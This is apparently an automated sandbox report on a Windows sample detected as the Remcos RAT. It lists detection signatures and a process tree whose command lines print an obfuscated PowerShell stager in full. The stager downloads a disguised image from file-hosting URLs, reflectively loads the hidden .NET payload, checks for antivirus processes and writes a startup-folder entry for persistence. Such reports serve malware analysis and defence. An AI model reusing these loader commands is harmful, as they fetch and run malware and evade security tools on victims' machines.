Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6706e721f2c06.exe

Overview

General Information

Sample name:6706e721f2c06.exe
Analysis ID:1530744
MD5:9d26cee91cd86b11808a161681be9f85
SHA1:f0334a5e2d01bbaf5bdb4a103bf9504dad218f85
SHA256:c3dee07cba853e66489d883ef5bcc094ea32861828ebfcde773e7527726be35c
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 6706e721f2c06.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\6706e721f2c06.exe" MD5: 9D26CEE91CD86B11808A161681BE9F85)
    • cmd.exe (PID: 7440 cmdline: cmd.exe /c 6706e721f2c06.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7512 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBj#HI#aQBq#EY#awBG#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • RegAsm.exe (PID: 7848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
            • RegAsm.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • PdfReaderEn.EXE (PID: 7960 cmdline: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE MD5: 5699D5B44379624EBC78078A1B85E18C)
                • cmd.exe (PID: 8040 cmdline: "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 6416 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                  • findstr.exe (PID: 6972 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                  • tasklist.exe (PID: 7056 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                  • findstr.exe (PID: 7236 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                  • cmd.exe (PID: 7552 cmdline: cmd /c md 603423 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • findstr.exe (PID: 7532 cmdline: findstr /V "speechesdjexpandingsoviet" Controllers MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                  • cmd.exe (PID: 7556 cmdline: cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • Lucas.pif (PID: 7500 cmdline: Lucas.pif s MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                    • cmd.exe (PID: 7440 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • choice.exe (PID: 7508 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
              • MicrosoftServiceUpdater.exe (PID: 8100 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe MD5: 1B8A04E03B265D0397C024B692E25C6E)
                • cmd.exe (PID: 8116 cmdline: cmd /c one.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • wscript.exe (PID: 8188 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP001.TMP\one.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                    • powershell.exe (PID: 5464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBt#H##YwBm#FM#bgBr#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
                      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • powershell.exe (PID: 1280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' 